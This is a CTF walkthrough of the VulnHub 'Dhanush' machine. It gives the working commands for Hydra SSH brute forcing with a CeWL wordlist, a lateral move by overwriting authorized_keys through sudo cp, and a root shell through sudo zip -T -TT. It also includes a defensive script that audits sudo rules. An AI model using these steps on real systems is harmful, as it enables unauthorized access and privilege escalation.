Dhanush VulnHub CTF Walkthrough

This walkthrough covers the steps taken to complete the Dhanush virtual machine from VulnHub, from reconnaissance to gaining root access.

Step 1: Identify the Target Host

We first identified the IP address of the target machine on our network using Netdiscover. The scan showed three hosts, and 192.168.187.155 was identified as the target.

Step 2: Port Scanning with Nmap

We performed a full port scan with service and script detection. Nmap revealed two open ports: 80/tcp running Apache 2.4.29 (Ubuntu) and 65345/tcp running OpenSSH 7.6p1. The web server title was “HA: Dhanush,” and the target is a Linux system on VMware.

Step 3: Web Enumeration

We checked robots.txt using a curl request, but it returned 404 Not Found. Nikto was run against the web server, finding missing security headers and directory indexing at /images/, but no exploitable vulnerabilities. Directory brute-forcing with Gobuster, Dirb, or Dirsearch yielded no interesting results.

curl http://192.168.187.155/robots.txt

Step 4: Password Brute-Forcing via SSH

Since the web services provided no direct exploit, we focused on SSH. We generated a custom wordlist of 114 words from the website using CeWL. Using Hydra with this wordlist for both usernames and passwords, we successfully brute-forced the SSH credentials: username pinak and password Gandiv.

cewl -d 3 http://192.168.187.155 -w dict.txt
wc -l dict.txt  # 114 words
hydra -L dict.txt -P dict.txt ssh://192.168.187.155 -s 65345

Step 5: Initial Shell Access

We logged in as pinak via SSH on port 65345. This provided a user shell on the target machine.

ssh pinak@192.168.187.155 -p 65345

Step 6: Privilege Escalation

We checked sudo privileges with sudo -l. The output showed that user pinak could run /bin/cp as user sarang without a password. We exploited this by copying pinak's id_rsa.pub to sarang's authorized_keys, then SSHing into sarang's account.

User pinak may run the following commands on ubuntu:
    (sarang) NOPASSWD: /bin/cp

sudo -u sarang /bin/cp id_rsa.pub /home/sarang/.ssh/authorized_keys
ssh sarang@127.0.0.1 -p 65345

For root escalation, we checked sarang's sudo privileges and found that sarang could run /usr/bin/zip as root without a password. zip's -T option tests the archive after writing it, and -TT lets the caller choose the command used for that test, so the supplied command runs as root. Using zip with a shell payload, we obtained a root shell.

User sarang may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/zip

cd /tmp
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
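The two sudo rules above chain into a path from pinak to root. As an added example (not part of the original walkthrough), this Python script audits `sudo -l` style listings for such chains so they can be removed from sudoers; the RISKY table, function names and sample text are assumptions for illustration, limited to the two binaries this page demonstrates.

```python
import re
from collections import deque

# Assumption: illustrative table holding only the two binaries from this page.
RISKY = {
    "/bin/cp": "arbitrary file write as the target user (e.g. authorized_keys)",
    "/usr/bin/zip": "runs a caller-supplied command via -T -TT",
}
HEADER = re.compile(r"^User (\S+) may run the following commands")
RULE = re.compile(r"^\s*\((\w+)\)\s*(NOPASSWD:)?\s*(\S+)")

def parse_sudo_l(text):
    """Return (user, runas, nopasswd, command) tuples from `sudo -l` style output."""
    rules, user = [], None
    for line in text.splitlines():
        if m := HEADER.match(line):
            user = m.group(1)
        elif user and (m := RULE.match(line)):
            rules.append((user, m.group(1), bool(m.group(2)), m.group(3)))
    return rules

def escalation_path(rules, start, goal="root"):
    """Breadth-first search over risky NOPASSWD rules; returns the hop list or None."""
    edges = {}
    for user, runas, nopasswd, cmd in rules:
        if nopasswd and cmd in RISKY:
            edges.setdefault(user, []).append((runas, cmd))
    queue, seen = deque([(start, [])]), {start}
    while queue:
        user, path = queue.popleft()
        if user == goal:
            return path
        for runas, cmd in edges.get(user, []):
            if runas not in seen:
                seen.add(runas)
                queue.append((runas, path + [(user, runas, cmd)]))
    return None

# Constructed sample: the two `sudo -l` listings quoted in this walkthrough.
SAMPLE = """\
User pinak may run the following commands on ubuntu:
    (sarang) NOPASSWD: /bin/cp
User sarang may run the following commands on ubuntu:
    (root) NOPASSWD: /usr/bin/zip
"""
if __name__ == "__main__":
    for user, runas, cmd in escalation_path(parse_sudo_l(SAMPLE), "pinak") or []:
        print(f"{user} -> {runas} via {cmd}: {RISKY[cmd]}")
```

A returned path means each hop should be replaced with a narrower rule or removed; requiring a password on either hop breaks the chain this audit reports.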

Step 7: Capture the Flag

Navigating to /root, we found flag.txt and read its contents, successfully capturing the root flag.

@p
@@@.
@@@@@
@@@@@@@
...

Summary

  1. Reconnaissance with Netdiscover identified the target.

  2. Nmap scanning revealed HTTP and SSH services.

  3. Web enumeration provided no direct exploits.

  4. SSH credentials were obtained via brute-force using a custom wordlist.

  5. Privilege escalation was performed first to user sarang via sudo /bin/cp, then to root via sudo /usr/bin/zip.

  6. Root shell was obtained and the flag captured.
